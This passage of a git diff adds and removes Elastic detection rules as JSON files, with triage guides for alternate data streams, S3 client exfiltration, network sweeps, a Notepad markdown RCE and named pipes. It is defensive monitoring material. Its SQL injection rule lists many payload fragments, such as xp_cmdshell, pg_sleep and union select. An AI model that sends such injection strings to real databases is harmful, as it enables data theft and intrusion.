system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"mshta.exe\", \"wscript.exe\", \"node.exe\", \"python*.exe\") and\n file.extension in~ (\n \"pdf\", \"dll\", \"exe\", \"dat\", \"com\", \"bat\", \"cmd\", \"sys\", \"vbs\", \"vbe\", \"ps1\", \"hta\", \"txt\", \"js\", \"jse\",\n \"wsh\", \"wsf\", \"sct\", \"docx\", \"doc\", \"xlsx\", \"xls\", \"pptx\", \"ppt\", \"rtf\", \"gif\", \"jpg\", \"png\", \"bmp\", \"img\", \"iso\"\n ) and\n file.path : \"C:\\\\*:*\" and\n not file.name :(\"*:$DATA\", \"*PG$Secure\", \"*Zone.Identifier\", \"*com.apple.lastuseddate#PS\", \"*com.apple.provenance\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.004", + "name": "NTFS File Attributes", + "reference": "https://attack.mitre.org/techniques/T1564/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 322 + }, + "id": "71bccb61-e19b-452f-b104-79a60e546a95_322", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/73344d2d-9cfb-4daf-b3c5-1d40a8182b86_1.json b/packages/security_detection_engine/kibana/security_rule/73344d2d-9cfb-4daf-b3c5-1d40a8182b86_1.json new file mode 100644 index 00000000000..33a305d49ef --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/73344d2d-9cfb-4daf-b3c5-1d40a8182b86_1.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies AWS API activity originating from uncommon desktop client applications based on the user agent string. This rule detects S3 Browser and Cyberduck, which are graphical S3 management tools that provide bulk upload/download capabilities. While legitimate, these tools are rarely used in enterprise environments and have been observed in use by threat actors for data exfiltration. Any activity from these clients should be validated against authorized data transfer workflows.", + "false_positives": [ + "Some organizations may have legitimate use cases for S3 Browser or Cyberduck, particularly in development, data migration, or backup scenarios. Verify whether the IAM principal, source network, and accessed buckets align with approved workflows. Unexpected activity from these clients, especially accessing sensitive buckets, should be investigated." + ], + "from": "now-6m", + "history_window_start": "now-7d", + "index": [ + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "aws.cloudtrail.resources.arn", + "aws.cloudtrail.resources.type", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS API Activity from Uncommon S3 Client by Rare User", + "new_terms_fields": [ + "cloud.account.id", + "user.name" + ], + "note": "## Triage and Analysis\n\n### Investigating AWS API Activity from Uncommon S3 Client by Rare User\n\nS3 Browser and Cyberduck are graphical clients for Amazon S3 that allow users to browse, upload, download, and manage S3 objects. While legitimate tools, they are uncommonly used in enterprise environments where organizations typically standardize on AWS CLI, SDKs, or console access. The presence of these tools may indicate unauthorized data access or exfiltration activity.\n\nThis is a [New Terms](https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule) rule that identifies the first time a specific user within an account makes API calls using S3 Browser or Cyberduck user agent strings. Threat actors have been observed using these tools for their intuitive interface and bulk data transfer capabilities during post-compromise data theft operations.\n\n### Possible investigation steps\n\n- **Identify the actor**\n - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine which IAM principal was used.\n - Check whether this principal normally accesses S3 and whether usage of these desktop clients is expected or authorized.\n\n- **Review accessed resources**\n - Examine `aws.cloudtrail.resources.arn` to identify which S3 buckets and objects were accessed.\n - Determine whether the accessed data is sensitive, confidential, or subject to data protection policies.\n - Look for patterns indicating bulk downloads or systematic enumeration of bucket contents.\n\n- **Analyze the actions performed**\n - Review `event.action` to understand what operations were performed (e.g., `GetObject`, `ListBucket`, `PutObject`).\n - High volumes of `GetObject` calls may indicate data exfiltration.\n - `PutObject` calls to external buckets could indicate data staging for exfiltration.\n\n- **Inspect source network context**\n - Review `source.ip` and `source.geo` fields to determine the origin of the request.\n - Check whether the IP belongs to corporate infrastructure, VPN, or an unexpected external location.\n - External IPs combined with these desktop client tools are high-risk indicators.\n\n- **Correlate with surrounding activity**\n - Search for additional CloudTrail events from the same access key or session.\n - Look for preceding credential theft indicators such as `GetSecretValue`, `CreateAccessKey`, or console logins.\n - Check for cross-account transfers or `CreateBucket` calls in external accounts.\n\n### False positive analysis\n\n- **Authorized data migration or backup activities** may use these tools. Confirm with data engineering or IT teams.\n- **Developer testing** in non-production environments may occasionally involve these clients. Validate the environment and data sensitivity.\n- **Third-party integrations** using Cyberduck libraries may generate this user agent. Verify the automation context.\n\n### Response and remediation\n\n- **If unauthorized**, immediately revoke or rotate the affected access keys and invalidate active sessions.\n- **Assess data exposure** by reviewing which objects were accessed and determining if sensitive data was compromised.\n- **Notify security operations** and initiate incident response procedures if exfiltration is confirmed.\n- **Implement preventive controls** such as S3 bucket policies restricting access by user agent or requiring VPC endpoints.\n\n### Additional information\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)**\n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)**\n- **[AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/)**\n", + "query": "event.dataset: \"aws.cloudtrail\"\n and user_agent.original: (*S3 Browser* or *Cyberduck*)\n and event.outcome: \"success\"\n", + "references": [ + "https://s3browser.com/", + "https://cyberduck.io/", + "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud", + "https://attackevals.github.io/ael/enterprise/scattered_spider/emulation_plan/scattered_spider_scenario/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "user_agent.original", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "73344d2d-9cfb-4daf-b3c5-1d40a8182b86", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS CloudTrail", + "Data Source: AWS S3", + "Tactic: Exfiltration", + "Use Case: Threat Detection", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/", + "subtechnique": [ + { + "id": "T1567.002", + "name": "Exfiltration to Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1567/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "73344d2d-9cfb-4daf-b3c5-1d40a8182b86_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_11.json b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_11.json deleted file mode 100644 index cc4b35ad1e7..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_11.json +++ /dev/null @@ -1,115 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule defines a threshold-based approach to detect multiple connection attempts from a single host to numerous destination hosts over commonly used network services.", - "from": "now-9m", - "index": [ - "packetbeat-*", - "filebeat-*", - "logs-network_traffic.*", - "logs-panw.panos*" - ], - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 5, - "name": "Potential Network Sweep Detected", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Network Sweep Detected\n\nNetwork sweeps are reconnaissance techniques where attackers scan networks to identify active hosts and services, often targeting common ports. This activity helps adversaries map out network vulnerabilities for future exploitation. The detection rule identifies such sweeps by monitoring connection attempts from a single source to multiple destinations on key ports, flagging potential reconnaissance activities for further investigation.\n\n### Possible investigation steps\n\n- Review the source IP address to determine if it belongs to a known or trusted entity within the network, focusing on the private IP ranges specified in the query (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16).\n- Analyze the destination IP addresses to identify any patterns or commonalities, such as specific subnets or devices, that could indicate targeted reconnaissance.\n- Check historical logs for previous connection attempts from the same source IP to see if there is a pattern of repeated scanning behavior or if this is an isolated incident.\n- Investigate the specific ports targeted (21, 22, 23, 25, 139, 445, 3389, 5985, 5986) to determine if they are associated with critical services or known vulnerabilities within the network.\n- Correlate the detected activity with any recent changes or incidents in the network environment that might explain the behavior, such as new device deployments or configuration changes.\n- Consult threat intelligence sources to determine if the source IP or similar scanning patterns have been associated with known threat actors or campaigns.\n\n### False positive analysis\n\n- Internal network scans by IT teams can trigger the rule. Regularly scheduled scans for security assessments should be documented and their source IPs added to an exception list to prevent false alerts.\n- Automated monitoring tools that check network health might cause false positives. Identify these tools and exclude their IP addresses from the rule to avoid unnecessary alerts.\n- Load balancers or network devices that perform health checks across multiple hosts can be mistaken for network sweeps. Exclude these devices by adding their IPs to a whitelist.\n- Development or testing environments where multiple connections are made for legitimate purposes can trigger the rule. Ensure these environments are recognized and their IP ranges are excluded from monitoring.\n- Misconfigured devices that repeatedly attempt to connect to multiple hosts can appear as network sweeps. Investigate and correct the configuration, then exclude these devices if necessary.\n\n### Response and remediation\n\n- Isolate the source IP: Immediately isolate the source IP address identified in the alert from the network to prevent further reconnaissance or potential exploitation of identified vulnerabilities.\n\n- Block suspicious ports: Implement firewall rules to block incoming and outgoing traffic on the commonly targeted ports (21, 22, 23, 25, 139, 445, 3389, 5985, 5986) from the source IP to mitigate further scanning attempts.\n\n- Conduct a network-wide scan: Perform a comprehensive scan of the network to identify any unauthorized access or changes that may have occurred as a result of the network sweep.\n\n- Review and update access controls: Ensure that access controls and permissions are appropriately configured to limit exposure of critical services and sensitive data.\n\n- Monitor for recurrence: Set up enhanced monitoring and alerting for any future connection attempts from the source IP or similar patterns of network sweep activity.\n\n- Escalate to security operations: Notify the security operations team to conduct a deeper investigation into the source of the network sweep and assess any potential threats or breaches.\n\n- Document and report: Record all findings, actions taken, and lessons learned in an incident report to inform future response strategies and improve network defenses.", - "query": "event.action:network_flow and destination.port:(21 or 22 or 23 or 25 or 139 or 445 or 3389 or 5985 or 5986) and\nsource.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", - "related_integrations": [ - { - "package": "network_traffic", - "version": "^1.1.0" - }, - { - "package": "panw", - "version": "^5.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "destination.port", - "type": "long" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - } - ], - "risk_score": 21, - "rule_id": "781f8746-2180-4691-890c-4c96d11ca91d", - "severity": "low", - "tags": [ - "Domain: Network", - "Tactic: Discovery", - "Tactic: Reconnaissance", - "Use Case: Network Security Monitoring", - "Data Source: PAN-OS", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1046", - "name": "Network Service Discovery", - "reference": "https://attack.mitre.org/techniques/T1046/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0043", - "name": "Reconnaissance", - "reference": "https://attack.mitre.org/tactics/TA0043/" - }, - "technique": [ - { - "id": "T1595", - "name": "Active Scanning", - "reference": "https://attack.mitre.org/techniques/T1595/", - "subtechnique": [ - { - "id": "T1595.001", - "name": "Scanning IP Blocks", - "reference": "https://attack.mitre.org/techniques/T1595/001/" - } - ] - } - ] - } - ], - "threshold": { - "cardinality": [ - { - "field": "destination.ip", - "value": 100 - } - ], - "field": [ - "source.ip" - ], - "value": 1 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 11 - }, - "id": "781f8746-2180-4691-890c-4c96d11ca91d_11", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7f3521dd-fb80-4548-a7eb-8db37b898dc2_2.json b/packages/security_detection_engine/kibana/security_rule/7f3521dd-fb80-4548-a7eb-8db37b898dc2_2.json new file mode 100644 index 00000000000..808202f3bda --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7f3521dd-fb80-4548-a7eb-8db37b898dc2_2.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a process started by Notepad after opening a Markdown file. This may indicate successful exploitation of a Notepad markdown parsing vulnerability (CVE-2026-20841) that can lead to arbitrary code execution.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Notepad Markdown RCE Exploitation", + "note": "## Triage and analysis\n\n### Investigating Potential Notepad Markdown RCE Exploitation\n\nThis rule detects a new child process launched by `notepad.exe` when Notepad was opened with a Markdown (`.md`) file.\nThis behavior can indicate exploitation of a Notepad remote code execution vulnerability where crafted Markdown content\ntriggers unintended process execution.\n\n### Possible investigation steps\n\n- Validate the parent-child relationship and confirm `notepad.exe` is the direct parent of the suspicious process.\n- Review the full command line of both parent and child processes, including the Markdown file path in `process.parent.args`.\n- Identify the Markdown file source (email attachment, browser download, chat client, removable media, or network share).\n- Inspect process ancestry and descendants for additional payload execution, script interpreters, or LOLBIN activity.\n- Correlate with file, registry, and network events around the same timestamp to identify follow-on behavior.\n- Determine whether the child process and its execution path are expected in your environment.\n\n### False positive analysis\n\n- Legitimate automation or editor extensions may occasionally spawn helper processes from Notepad workflows.\n- User-driven workflows that invoke external tools from Markdown previews can trigger this behavior.\n- If benign, tune by excluding known-safe child process names, hashes, signed binaries, and approved file paths.\n\n### Response and remediation\n\n- Isolate affected endpoints until scope is understood.\n- Terminate suspicious child and descendant processes initiated from `notepad.exe`.\n- Quarantine and preserve the triggering Markdown file for forensic analysis.\n- Run endpoint malware scans and collect volatile artifacts (running processes, network connections, autoruns).\n- Patch Windows/Notepad to the latest security update level addressing the vulnerability.\n- Hunt for the same parent-child pattern across other hosts to identify additional impacted systems.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"notepad.exe\" and process.parent.args : \"*.md\" and\n not process.executable : \"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsNotepad_*\\\\Notepad\\\\Notepad.exe\"\n", + "references": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7f3521dd-fb80-4548-a7eb-8db37b898dc2", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "7f3521dd-fb80-4548-a7eb-8db37b898dc2_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_2.json b/packages/security_detection_engine/kibana/security_rule/7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_2.json new file mode 100644 index 00000000000..53670a67908 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_2.json @@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule detects potential SQL injection attempts in web server requests by identifying common SQL injection patterns in URLs. Such activity may indicate reconnaissance or exploitation attempts by attackers trying to manipulate backend databases or extract sensitive information.", + "from": "now-9m", + "index": [ + "logs-nginx.access-*", + "logs-apache.access-*", + "logs-apache_tomcat.access-*", + "logs-iis.access-*", + "logs-traefik.access-*" + ], + "interval": "10m", + "language": "eql", + "license": "Elastic License v2", + "name": "Web Server Potential SQL Injection Request", + "query": "any where url.original like~ (\n \"*%20order%20by%*\", \"*dbms_pipe.receive_message%28chr%*\", \"*waitfor%20delay%20*\", \"*%28select%20*from%20pg_sleep%285*\", \"*%28select%28sleep%285*\", \"*%3bselect%20pg_sleep%285*\",\n \"*select%20concat%28concat*\", \"*xp_cmdshell*\", \"*select*case*when*\", \"*and*extractvalue*select*\", \"*from*information_schema.tables*\", \"*boolean*mode*having*\", \"*extractvalue*concat*\",\n \"*case*when*sleep*\", \"*select*sleep*\", \"*dbms_lock.sleep*\", \"*and*sleep*\", \"*like*sleep*\", \"*csleep*\", \"*pgsleep*\", \"*char*char*char*\", \"*union*select*\", \"*concat*select*\",\n \"*select*else*drop*\", \"*having*like*\", \"*case*else*end*\", \"*if*sleep*\", \"*where*and*select*\", \"*or*1=1*\", \"*\\\"1\\\"=\\\"1\\\"*\", \"*or*'a'='a*\", \"*into*outfile*\", \"*pga_sleep*\",\n \"*into%20outfile*\", \"*into*dumpfile*\", \"*load_file%28*\", \"*load%5ffile%28*\", \"*cast%28*\", \"*convert%28*\", \"*cast%28%*\", \"*convert%28%*\", \"*@@version*\", \"*@@version_comment*\",\n \"*version%28*\", \"*user%28*\", \"*current_user%28*\", \"*database%28*\", \"*schema_name%28*\", \"*information_schema.columns*\", \"*information_schema.columns*\", \"*table_schema*\",\n \"*column_name*\", \"*dbms_pipe*\", \"*dbms_lock%2e*sleep*\", \"*dbms_lock.sleep*\", \"*sp_executesql*\", \"*sp_executesql*\", \"*load%20data*\", \"*information_schema*\", \"*pg_slp*\",\n \"*information_schema.tables*\"\n)\n", + "required_fields": [ + { + "ecs": true, + "name": "url.original", + "type": "wildcard" + } + ], + "risk_score": 21, + "rule_id": "7f7a0ee1-7b6f-466a-85b4-110fb105f5e2", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8167c5ae-3310-439a-8a58-be60f55023d2_2.json b/packages/security_detection_engine/kibana/security_rule/8167c5ae-3310-439a-8a58-be60f55023d2_2.json deleted file mode 100644 index 80903671869..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/8167c5ae-3310-439a-8a58-be60f55023d2_2.json +++ /dev/null @@ -1,122 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the creation of unusually labeled named pipes (FIFOs) by the mkfifo command, which is often used by attackers to establish persistence on a target system or to execute commands in the background. Through the new_terms rule type, this rule can identify uncommon process command lines that may indicate the presence of a malicious named pipe.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "logs-endpoint.events.process*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Suspicious Named Pipe Creation", - "new_terms_fields": [ - "host.id", - "process.command_line" - ], - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious Named Pipe Creation\n\nNamed pipes, or FIFOs, are a form of inter-process communication in Linux environments, allowing data transfer between processes. Adversaries exploit this by creating named pipes in common directories like /tmp to stealthily execute commands or maintain persistence. The detection rule identifies unusual named pipe creation by monitoring the `mkfifo` command, especially when initiated by common shell processes, to flag potential malicious activity.\n\n### Possible investigation steps\n\n- Review the process command line arguments to identify the exact named pipe path and any associated commands or scripts that might have been executed using the named pipe.\n- Investigate the parent process (bash, csh, dash, fish, ksh, sh, tcsh, or zsh) to determine the origin of the mkfifo command, checking for any unusual or unexpected scripts or commands that might have initiated it.\n- Examine the user account associated with the mkfifo process to determine if it is a legitimate user or if the account might have been compromised.\n- Check for any other suspicious activities or processes running under the same user account or originating from the same parent process to identify potential lateral movement or further malicious actions.\n- Analyze the system logs around the time of the named pipe creation for any other indicators of compromise, such as unauthorized access attempts or unusual network connections.\n- If possible, capture and review the contents of the named pipe to understand the data being transferred and assess whether it is part of a malicious operation.\n\n### False positive analysis\n\n- Named pipes created by legitimate applications for inter-process communication can trigger this rule. Users should identify and whitelist these applications by adding exceptions for specific process command lines that are known to be safe.\n- System maintenance scripts or backup processes that use named pipes in directories like /tmp or /var/tmp may cause false positives. Review these scripts and exclude them from the rule if they are verified as non-malicious.\n- Development environments or testing frameworks that frequently create and delete named pipes during their operations might be flagged. Users can mitigate this by excluding these environments from monitoring or by specifying exceptions for known development tools.\n- Automated deployment tools that use named pipes for configuration management or orchestration tasks can also be a source of false positives. Ensure these tools are recognized and excluded from the rule to prevent 